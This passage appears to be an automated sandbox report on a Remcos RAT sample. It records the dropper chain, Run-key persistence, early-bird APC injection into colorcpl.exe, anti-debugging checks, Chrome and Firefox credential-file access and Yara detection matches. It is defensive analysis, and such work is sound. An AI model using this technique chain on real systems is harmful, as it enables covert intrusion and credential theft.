                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029162A4 push 0291630Fh; ret 3_2_02916307
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FC3B6 push 028FC61Eh; ret 3_2_028FC616
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029160AC push 02916125h; ret 3_2_0291611D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290A018 push ecx; mov dword ptr [esp], edx3_2_0290A01D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290606C push 029060A4h; ret 3_2_0290609C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029161F8 push 02916288h; ret 3_2_02916280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02916144 push 029161ECh; ret 3_2_029161E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F617C push 028F61BEh; ret 3_2_028F61B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F617A push 028F61BEh; ret 3_2_028F61B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0297C63F push ecx; ret 3_2_0297C652
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0295A796 push ecx; ret 3_2_0295A7A9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FC498 push 028FC61Eh; ret 3_2_028FC616
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02902410 push ecx; mov dword ptr [esp], edx3_2_02902412
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02902EDA push 02902F87h; ret 3_2_02902F7F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02902EDC push 02902F87h; ret 3_2_02902F7F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0297CF70 push eax; ret 3_2_0297CF8E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FCDE0 push 028FCE0Ch; ret 3_2_028FCE04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F3210 push eax; ret 3_2_028F324C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FF600 push 028FF64Dh; ret 3_2_028FF645
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FF4F4 push 028FF56Ah; ret 3_2_028FF562
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FF5FF push 028FF64Dh; ret 3_2_028FF645
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02915854 push 02915A3Ah; ret 3_2_02915A32
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FBE18 push ecx; mov dword ptr [esp], edx3_2_028FBE1D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903F84 push 02903FBCh; ret 3_2_02903FB4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909FB4 push ecx; mov dword ptr [esp], edx3_2_02909FB9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F5D9E push 028F5DFBh; ret 3_2_028F5DF3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F5DA0 push 028F5DFBh; ret 3_2_028F5DF3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903D40 push 02903D82h; ret 3_2_02903D7A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E35226 push ecx; ret 8_2_02E35239
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E570CF push ecx; ret 8_2_02E570E2
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E57A00 push eax; ret 8_2_02E57A1E

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\Links\Ekbmajrx.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E062E2 ShellExecuteW,URLDownloadToFileW,8_2_02E062E2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\Links\Ekbmajrx.PIFJump to dropped file
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_02E1AC43
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EkbmajrxJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EkbmajrxJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029064E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_029064E4
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_02E1A941
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,16_2_0301A941
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 5517Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 4011Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1738Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 6.1 %
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4852Thread sleep count: 156 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4852Thread sleep time: -78000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576Thread sleep count: 5517 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576Thread sleep time: -16551000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576Thread sleep count: 4011 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576Thread sleep time: -12033000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_028F52F8
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,8_2_02E090DC
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_02E0B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,8_2_02E1C7E5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_02E0B8BA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E4E989 FindFirstFileExA,8_2_02E4E989
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E07EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,8_2_02E07EDD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E06F13 FindFirstFileW,FindNextFileW,8_2_02E06F13
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E19CEE FindFirstFileW,FindNextFileW,FindNextFileW,8_2_02E19CEE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E08CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,8_2_02E08CDE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,16_2_030090DC
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,16_2_0301C7E5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0300B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0300B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0304E989 FindFirstFileExA,16_2_0304E989
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0300B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0300B8BA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03006F13 FindFirstFileW,FindNextFileW,16_2_03006F13
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03007EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,16_2_03007EDD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03008CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,16_2_03008CDE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03019CEE FindFirstFileW,FindNextFileW,FindNextFileW,16_2_03019CEE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E07357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_02E07357
                      Source: Ekbmajrx.PIF, 00000012.00000002.1423292537.00000000006A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                      Source: wscript.exe, 00000001.00000002.1239732010.0000024EFAF3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}E
                      Source: x.exe, 00000003.00000002.1254201790.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                      Source: Ekbmajrx.PIF, 0000000F.00000002.1342950778.00000000008D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_3-63327
                      Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_8-48804
                      Source: C:\Users\user\Links\Ekbmajrx.PIFAPI call chain: ExitProcess graph end node

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,3_2_0290A5B0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E3B88D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,3_2_02903E20
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029A691D mov eax, dword ptr fs:[00000030h]3_2_029A691D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02968E64 mov eax, dword ptr fs:[00000030h]3_2_02968E64
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E438F4 mov eax, dword ptr fs:[00000030h]8_2_02E438F4
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030438F4 mov eax, dword ptr fs:[00000030h]16_2_030438F4
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E11999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,8_2_02E11999
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E35398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02E35398
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E3B88D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E34F01 SetUnhandledExceptionFilter,8_2_02E34F01
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E34D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E34D6E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03035398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_03035398
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0303B88D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03034F01 SetUnhandledExceptionFilter,16_2_03034F01
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03034D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_03034D6E

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Benign windows process drops PE files
                      Source: C:\Windows\System32\wscript.exeFile created: x.exe.1.drJump to dropped file
                      Early bird code injection technique detected
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E00000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3000000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2BD0000 protect: page execute and read and writeJump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E197D9 mouse_event,8_2_02E197D9
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.79:786
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerer|
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.79
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Sg
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.79:786|GB
                      Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0295A5A4 cpuid 3_2_0295A5A4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_028F54BC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,3_2_028FA0B8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,3_2_028FA104
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_028F55C8
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,8_2_02E0F26B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_02E5220A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_02E520E2
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_02E52097
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_02E5217D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_02E5268A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_02E52757
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_02E4844E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_02E5245A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_02E52583
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_02E48937
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_02E51E1F
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_029654BC
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: GetLocaleInfoA,15_2_0296A104
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_029655C7
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_0305220A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,16_2_0300F26B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,16_2_0305217D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,16_2_03052097
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,16_2_030520E2
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_03052757
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,16_2_0305268A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_03052583
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,16_2_0304844E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,16_2_0305245A
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,16_2_03048937
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,16_2_03051E1F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F8B38 GetLocalTime,3_2_028F8B38
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909F00 GetUserNameA,3_2_02909F00
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E493AF _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_02E493AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028FB038 GetVersionExA,3_2_028FB038
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_02E0B59B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0300B59B
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_02E0B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db8_2_02E0B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\16_2_0300B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db16_2_0300B6B5

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2Jump to behavior
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
